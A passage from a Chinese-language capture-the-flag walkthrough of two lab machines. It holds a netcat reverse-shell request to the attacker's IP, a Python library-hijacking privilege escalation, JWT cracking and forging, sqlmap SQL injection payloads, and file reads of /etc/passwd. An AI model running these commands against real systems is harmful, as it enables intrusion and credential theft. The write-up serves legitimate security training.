echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
}
} else {
echo '<div>No permission to execute commands, lacking admin permission.</div>';
}
?>
</div>
<div class="input-container">
<span class="prompt">\></span>
<form method="get">
<input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
</form>
</div>
</div>
<script>
const inputField = document.getElementById("input");
inputField.focus();
</script>
</body>
</html>
可以看到php代码有一个检测就是要设置cookie为AreYouAdmin并且值为Yes,抓包修改一下
GET /secret.php?command=nc+-e+/bin/sh+192.168.1.102+1234 HTTP/1.1
Host: 192.168.1.104
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Cookie: AreYouAdmin=Yes
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.104/secret.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
然后就能拿到一个shell了
sudo -l
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
targetpw, use_pty
User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
cat /var/www/html/vuln.py
import random
import time
import math
import string
import datetime
def generate_random_string(length=10):
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def pointless_computation():
number = random.randint(1, 1000)
result = math.sqrt(number) * math.log(number)
print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")
def simulate_time_wasting():
now = datetime.datetime.now()
print(f"Started wasting time at {now}")
time.sleep(2) # 故意睡眠 2 秒
later = datetime.datetime.now()
print(f"Finished wasting time at {later}. Time wasted: {later - now}")
def pointless_string_operations():
rand_str = generate_random_string()
print(f"Generated random string: {rand_str}")
reversed_str = rand_str[::-1]
print(f"Reversed string: {reversed_str}")
print(f"String length: {len(rand_str)}")
if __name__ == "__main__":
pointless_computation()
simulate_time_wasting()
pointless_string_operations()
print("All done. The script accomplished nothing useful.")
接着就是在找到了这个文件,这个文件就是导入了一些库,导入库的时候首先是在当前目录找库文件,可以在当前目录写一个库文件,内容是import os;os.system("/bin/bash"),这样使用其他用户运行这个脚本的时候,导入库文件就是先导入我们写的这个假文件,进行一个库文件的劫持,然后就能拿到指定用户的shell
sudo -l
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
targetpw, use_pty
User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py
cd /var/www/html
ls
flask
shop
vuln.py
echo 'import os;os.system("/bin/bash")' > random.py
sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
id
uid=1000(debian) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)
这样就能拿到debian用户的shell,然后拿到user flag
ls
config.php
note.txt
user.txt
cat user.txt
ed2b1f468c5f915f3f1cf75d7068baae
cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
root flag
这里也得到一个提示,然后还有一个.secret文件夹,这个文件夹下面也有一个提示
cat hint.txt
password is md5(key)
and key is in mysql!!!!!!
提示密码是md5
ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*
发现本地开了一个5000端口,我们需要使用socat把端口转发出去,这个靶机是有socat的,使用tldr找一个命令然后转发就好了
socat TCP-LISTEN:8000,fork TCP4:127.0.0.1:5000
ss -lntup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 5 0.0.0.0:8000 0.0.0.0:* users:(("socat",pid=2160,fd=5))
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 511 *:80 *:*
可以看到已经成功转发出去了,然后访问ip:8000,然后需要登录,这个随便输入什么登录一下就行,这个是使用jwt来验证你是否为admin的,可以使用john先爆破一下密码
┌──(root㉿kali-plus)-[~]
└─# john tmp --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
noob (?)
1g 0:00:00:00 DONE (2025-03-30 23:25) 1.449g/s 7313Kp/s 7313Kc/s 7313KC/s normaluz,2604...nmloera!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到密钥是noob,接下来去伪造一个jwt,使用jwt_tool这个工具,地址为:https://github.com/ticarpi/jwt_tool
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# cat setup.txt
git clone https://github.com/ticarpi/jwt_tool
cd jwt_tool
sudo apt install python3-pip
python3 -m pip install termcolor cprint pycryptodomex requests
chmod +x jwt_tool.py
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 -m pip install termcolor cprint pycryptodomex requests
Requirement already satisfied: termcolor in /usr/lib/python3/dist-packages (2.4.0)
Requirement already satisfied: cprint in /usr/local/lib/python3.11/dist-packages (1.2.2)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (3.11.0)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.31.0)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 -m pip install termcolor cprint pycryptodomex requests --root-user-action
Usage:
/usr/bin/python3 -m pip install [options] <requirement specifier> [package-index-options] ...
/usr/bin/python3 -m pip install [options] -r <requirements file> [package-index-options] ...
/usr/bin/python3 -m pip install [options] [-e] <vcs project url> ...
/usr/bin/python3 -m pip install [options] [-e] <local project path> ...
/usr/bin/python3 -m pip install [options] <archive url/path> ...
--root-user-action option requires 1 argument
┌──(root㉿kali-plus)-[~/jwt_tool]
└─# python3 jwt_tool.py -T -S hs256 -p noob eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhZCIsImV4cCI6MTc0MzM1MTcxN30.6I8qsnUorIfYfPHxF09yD3KLcFVirHHw0rHz9yIz2Ms
\ \ \ \ \ \
\__ | | \ |\__ __| \__ __| |
| | \ | | | \ \ |
| \ | | | __ \ __ \ |
\ | _ | | | | | | | |
| | / \ | | | | | | | |
\ | / \ | | |\ |\ | |
\______/ \__/ \__| \__| \__| \______/ \______/ \__|
Version 2.2.7 \______| @ticarpi
Original JWT:
====================================================================
This option allows you to tamper with the header, contents and
signature of the JWT.
====================================================================
Token header values:
[1] alg = "HS256"
[2] typ = "JWT"
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
Token payload values:
[1] username = "aad"
[2] exp = 1743351717 ==> TIMESTAMP = 2025-03-31 00:21:57 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 1
Current value of username is: aad
Please enter new value and hit ENTER
> admin
[1] username = "admin"
[2] exp = 1743351717 ==> TIMESTAMP = 2025-03-31 00:21:57 (UTC)
[3] *ADD A VALUE*
[4] *DELETE A VALUE*
[5] *UPDATE TIMESTAMPS*
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
jwttool_d6329eb7a09f667401ace111e474bb4f - Tampered token - HMAC Signing:
[+] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzQzMzUxNzE3fQ.WcYe5TS2RTGyy7rrpnb6Ja03VD7QKhfjTv2Rkcsj_Jo
HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.11.2
Date: Sun, 30 Mar 2025 15:43:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2302
Connection: close
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Message Board</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 20px;
text-align: center;
}
.container {
max-width: 600px;
margin: auto;
background: white;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
h2 {
color: #333;
}
.message {
padding: 10px;
margin: 10px 0;
background: #f9f9f9;
border-radius: 5px;
text-align: left;
}
.author {
font-weight: bold;
color: #007bff;
}
.nav {
text-align: right;
margin-bottom: 10px;
}
.btn {
padding: 5px 10px;
text-decoration: none;
color: white;
background: #007bff;
border-radius: 5px;
display: inline-block;
}
.btn.logout {
background: #dc3545;
}
</style>
</head>
<body>
<div class="container">
<div class="nav">
<a href="/logout" class="btn logout">Logout (admin)</a>
</div>
<h2>Message Board</h2>
<div class="message">
<p class="author">admin</p>
<p>Welcome to the secure message board!</p>
</div>
<div class="message">
<p class="author">admin</p>
<p>Mysql account: root:TheStrongestPasswordHYHcreated</p>
</div>
<div class="message">
<p class="author">user1</p>
<p>I think this is a great project!</p>
</div>
<div class="message">
<p class="author">user2</p>
<p>Hello everyone! Nice to be here.</p>
</div>
</div>
<!--
Todo:My secret key is very simple, I will change it soon.
-->
</body>
</html>
然后把jwt换掉就好了,得到数据库的密码TheStrongestPasswordHYHcreated,进数据库拿到
www-data@Newbee:/var/www/html/shop$ mysql -u root -p
mysql -u root -p
Enter password: TheStrongestPasswordHYHcreated
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| user |
+--------------------+
5 rows in set (0.001 sec)
MariaDB [(none)]> use user;
use user;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [user]> show tables;
show tables;
+----------------+
| Tables_in_user |
+----------------+
| user |
+----------------+
1 row in set (0.001 sec)
MariaDB [user]> select * from user;
select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd | salt | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| 1 | debian | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.123 sec)
然后扔给ai跑出一个爆破脚本,爆破出来的密码是1qaz2wsx,然后根据前面的提示,密码是md5(key)
┌──(root㉿kali-plus)-[~]
└─# echo -n '1qaz2wsx' |md5sum
1c63129ae9db9c60c3e8aa94d3e00495
这个得到的是压缩包的密码,然后解压一下压缩包,得到password.png,用nc给他传到kalI,再拿到本地来,发现是一个被打码的图片,然后github上找了一个项目,发现这个项目就是拿这个图片做示例的,项目地址:
https://github.com/spipm/Depixelization_poc
图片原本的内容是Hello from the other side,这个应该就是root的密码,发现不对,改成小写试试hello from the other side,还是不对,应该没有空格,hellofromtheotherside
debian@Newbee:/tmp$ su - root
su - root
Password: hellofromtheotherside
root@Newbee:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Newbee:~# ls
ls
root.txt
root@Newbee:~# cat root.txt
cat root.txt
c18b3eff03996f3a203f63733be03d15
SingDanceRap
信息搜集
mac地址为00:0C:29:E2:FD:6E,确定ip地址为192.168.50.58
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.50.85
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.50.1 fc:34:97:da:9f:88 ASUSTek COMPUTER INC.
192.168.50.58 00:0c:29:e2:fd:6e VMware, Inc.
192.168.50.155 e0:2e:0b:94:50:57 Intel Corporate
192.168.50.170 52:9c:20:6d:2d:db (Unknown: locally administered)
192.168.50.253 70:a8:d3:1d:8a:67 Intel Corporate
192.168.50.103 da:8e:c3:1d:21:85 (Unknown: locally administered)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.004 seconds (127.74 hosts/sec). 6 responded
┌──(root㉿kali-plus)-[~]
└─# nmap 192.168.50.58 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-31 15:00 CST
Nmap scan report for singdancerap (192.168.50.58)
Host is up (0.0014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
65000/tcp filtered unknown
MAC Address: 00:0C:29:E2:FD:6E (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.16 seconds
PE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>News Website</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<header>
<h1>News Website</h1>
<nav>
<ul>
<li><a href="#">Home</a></li>
<li><a href="news.php?title=sing">Sing News</a></li>
<li><a href="news.php?title=dance">Dance News</a></li>
<li><a href="news.php?title=rap">Rap News</a></li>
</ul>
</nav>
</header>
<main>
<section class="hero">
<h2>Today's Headlines</h2>
<p>Stay updated with the latest and most popular news.</p>
<a href="#" class="btn">Read More</a>
</section>
<section class="news">
<article class="news-item">
<h3>Singing News Headline</h3>
<p>This is a brief description of singing news.</p>
<a href="#" class="read-more">Read Full Article</a>
</article>
<article class="news-item">
<h3>Dancing News Headline</h3>
<p>This is a brief description of dancing news.</p>
<a href="#" class="read-more">Read Full Article</a>
</article>
<article class="news-item">
<h3>Rapping News Headline</h3>
<p>This is a brief description of rap news.</p>
<a href="#" class="read-more">Read Full Article</a>
</article>
</section>
</main>
<footer>
<p>© 2023 News Website. All rights reserved.</p>
</footer>
</body>
</html>
使用gobuster对目录进行扫描
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.50.58/ -x.txt,.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.58/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/news.php (Status: 200) [Size: 1301]
/.php (Status: 403) [Size: 278]
/littlesecrets (Status: 301) [Size: 322] [--> http://192.168.50.58/littlesecrets/]
/server-status (Status: 403) [Size: 278]
Progress: 661677 / 661680 (100.00%)
===============================================================
Finished
===============================================================
针对/littlesecrets这个目录再次扫描
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.50.58/littlesecrets -x.txt,.php,.html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.50.58/littlesecrets
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/login.php (Status: 200) [Size: 1983]
/manager.php (Status: 302) [Size: 0] [--> login.php]
/.html (Status: 403) [Size: 278]
/.php (Status: 403) [Size: 278]
Progress: 882236 / 882240 (100.00%)
===============================================================
Finished
===============================================================
发现有个登录页面,但是没发现存在弱口令,猜测是sql注入,抓个数据包让sqlmap跑一下
┌──(root㉿kali-plus)-[~]
└─# sqlmap -l sing.txt --batch
___
__H__
___ ___[(]_____ ___ ___ {1.9#stable}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:25:22 /2025-03-31/
[15:25:22] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.50.58:80/littlesecrets/login.php
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[15:25:22] [INFO] testing URL 'http://192.168.50.58:80/littlesecrets/login.php'
[15:25:22] [INFO] using '/root/.local/share/sqlmap/output/results-03312025_0325pm.csv' as the CSV results file in multiple targets mode
[15:25:22] [INFO] testing connection to the target URL
[15:25:22] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:25:22] [INFO] testing if the target URL content is stable
[15:25:23] [INFO] target URL content is stable
[15:25:23] [INFO] testing if POST parameter 'username' is dynamic
[15:25:23] [WARNING] POST parameter 'username' does not appear to be dynamic
[15:25:23] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[15:25:23] [INFO] testing for SQL injection on POST parameter 'username'
[15:25:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:23] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:25:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:25:23] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:25:23] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:25:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:25:23] [INFO] testing 'Generic inline queries'
[15:25:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:25:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:25:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:25:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:25:33] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:25:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:25:33] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:25:33] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 7217 FROM (SELECT(SLEEP(5)))jvCv) AND 'hZWY'='hZWY&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[15:25:48] [INFO] the back-end DBMS is MySQL
[15:25:48] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web server operating system: Linux Debian
web application technology: Apache 2.4.59
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:25:53] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-03312025_0325pm.csv'
[*] ending @ 15:25:53 /2025-03-31/
看不懂就扔给ai,这个返回结果是说明扫描到了sql注入漏洞并且是时间盲注漏洞,接下来使用sqlmap继续跑
sqlmap -l sing.txt -batch
sqlmap -l sing.txt -batch -dbs
sqlmap -l sing.txt -batch -D news_db --tables
sqlmap -l sing.txt -batch -D news_db -T users --columns
sqlmap -l sing.txt -batch -D news_db -T users -C user1 --dump
┌──(root㉿kali-plus)-[~]
└─# sqlmap -l sing.txt --batch -D news_db -T users -C user1 --dump
___
__H__
___ ___[.]_____ ___ ___ {1.9#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:52:17 /2025-03-31/
[15:52:17] [INFO] sqlmap parsed 1 (parameter unique) requests from the targets list ready to be tested
[1/1] URL:
GET http://192.168.50.58:80/littlesecrets/login.php
POST data: username=admin&password=admin
do you want to test this URL? [Y/n/q]
> Y
[15:52:18] [INFO] testing URL 'http://192.168.50.58:80/littlesecrets/login.php'
[15:52:18] [INFO] resuming back-end DBMS 'mysql'
[15:52:18] [INFO] using '/root/.local/share/sqlmap/output/results-03312025_0352pm.csv' as the CSV results file in multiple targets mode
[15:52:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 7217 FROM (SELECT(SLEEP(5)))jvCv) AND 'hZWY'='hZWY&password=admin
---
do you want to exploit this SQL injection? [Y/n] Y
[15:52:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.59
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:52:18] [INFO] fetching entries of column(s) 'user1' for table 'users' in database 'news_db'
[15:52:18] [INFO] fetching number of column(s) 'user1' entries for table 'users' in database 'news_db'
[15:52:18] [INFO] resumed: 2
[15:52:18] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[15:52:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:52:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:52:18] [INFO] retrieved:
Database: news_db
Table: users
[2 entries]
+---------+
| user1 |
+---------+
| <blank> |
| <blank> |
+---------+
[15:52:18] [INFO] table 'news_db.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.50.58/dump/news_db/users.csv'
[15:52:18] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-03312025_0352pm.csv'
[*] ending @ 15:52:18 /2025-03-31/
但是没法直接登录,显示<font style="color:rgb(0, 0, 0);">Access Denied. You do not have permission to access this page.</font>
user flag
这条路通不了,换一条路,回到news.php进行联合注入
sqlmap identified the following injection point(s) with a total of 66 HTTP(s) requests:
---
Parameter: title (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: title=sing' AND 2782=2782 AND 'arlV'='arlV
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=sing' AND (SELECT 4507 FROM (SELECT(SLEEP(5)))xeKo) AND 'odSe'='odSe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: title=sing' UNION ALL SELECT NULL,NULL,CONCAT(0x7171627a71,0x53567261624e586a5862514b4966727167526d524b6b67426c4c766e587051785449495576575146,0x717a787671)-- -
---
使用命令sqlmap -u "[http://192.168.50.58/news.php?title=sing"](http://192.168.50.58/news.php?title=sing") --file-read=/etc/passwd
读取文件
┌──(root㉿kali-plus)-[~]
└─# cat /root/.local/share/sqlmap/output/192.168.50.58/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_rpc:x:106:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
tftp:x:108:112:tftp daemon,,,:/srv/tftp:/usr/sbin/nologin
mysql:x:110:115:MySQL Server,,,:/nonexistent:/bin/false
he110wor1d:x:1001:1001::/home/he110wor1d:/bin/bash
接着把其他文件也尝试读取出来,比如读取配置文件,因为中间件是apache,所以尝试读取apache的配置文件
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
<Directory /var/www/he110wor1d/>
Options -Indexes
AllowOverride None
Require all granted
</Directory>
<VirtualHost *:80>
DocumentRoot /var/www/he110wor1d
<Directory /var/www/he110wor1d>
Options -Indexes
AllowOverride None
Require all granted
</Directory>
<FilesMatch \.php$>
SetHandler application/x-httpd-php
</FilesMatch>
ErrorLog ${APACHE_LOG_DIR}/xxx_error.log
CustomLog ${APACHE_LOG_DIR}/xxx_access.log combined
</VirtualHost>
可以看到网站的一些源码都在/var/www/he110wor1d目录,然后可以去读取manager.php的内容
┌──(root㉿kali-plus)-[~]
└─# cat /root/.local/share/sqlmap/output/192.168.50.58/files/_var_www_he110wor1d_littlesecrets_manager.php
<?php
session_start();
if (!isset($_SESSION['username'])) {
header("Location: login.php");
exit();
}
if ($_SESSION['username'] !== 'he110wor1d_admin') {
die("Access Denied. You do not have permission to access this page.");
}
$command_output = '';
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['command'])) {
$command = $_POST['command'];
$command_output = shell_exec($command);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Manager Panel</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}
.manager-container {
background-color: #fff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
width: 600px;
text-align: center;
}
.manager-container h2 {
margin-bottom: 20px;
color: #333;
}
.manager-container input[type="text"] {
width: 100%;
padding: 10px;
margin-bottom: 15px;
border: 1px solid #ccc;
border-radius: 5px;
font-size: 16px;
}
.manager-container input[type="submit"] {
width: 100%;
padding: 10px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
font-size: 16px;
cursor: pointer;
}
.manager-container input[type="submit"]:hover {
background-color: #0056b3;
}
.manager-container .output {
background-color: #f9f9f9;
padding: 10px;
border: 1px solid #ccc;
border-radius: 5px;
margin-top: 20px;
text-align: left;
font-family: monospace;
white-space: pre-wrap;
word-wrap: break-word;
}
</style>
</head>
<body>
<div class="manager-container">
<h2>Manager Panel</h2>
<form action="manager.php" method="POST">
<input type="text" name="command" placeholder="Enter command" required>
<input type="submit" value="Execute">
</form>
<?php if (!empty($command_output)): ?>
<div class="output">
<h3>Command Output:</h3>
<pre><?php echo htmlspecialchars($command_output); ?></pre>
</div>
<?php endif; ?>
</div>
</body>
</html>
发现可以命令执行,需要用户名是he110wor1d_admin,然后post传参command进行命令执行,但是没成功,再去读取一下login.php的源码
